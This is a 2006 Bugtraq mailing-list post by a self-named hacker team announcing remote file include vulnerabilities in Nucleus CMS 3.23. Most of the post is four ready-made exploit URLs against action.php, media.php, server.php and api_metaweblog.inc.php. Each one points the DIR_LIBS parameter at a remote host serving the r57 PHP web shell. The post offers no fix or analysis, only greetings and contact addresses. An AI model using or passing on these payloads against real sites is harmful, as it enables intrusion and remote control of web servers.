
Date: 16 Jun 2006 17:01:28 -0000
From: gamr-14@...mail.com
To: bugtraq@...urityfocus.com
Subject: file include exploits in nucleus 3.23


Multiple file include exploits in nucleus 3.23 

script type : nucleus 3.23  
bug found by : sweet-devil
team : site-down
type : file include 

####################################################
exploits :


action.php

http://www.example.com/path/action.php?DIR_LIBS=http://yoursite/r57shell.txt?

media.php

http://www.example.com/path/nucleus/media.php?DIR_LIBS=http://yoursite/r57shell.txt?

server.php

http://www.example.com/path/nucleus/xmlrpc/server.php?DIR_LIBS=http://yoursite/r57shell.txt?

api_metaweblog.inc.php

http://www.example.com/path/nucleus/xmlrpc/api_metaweblog.inc.php?DIR_LIBS=http://yoursite/r57shell.txt?

####################################################


#######################
emails: 

gamr-14@...mail.com  &  black-cod3@...mail.com
#######################


All my respect to our friends , lezr.com 


done .. peace


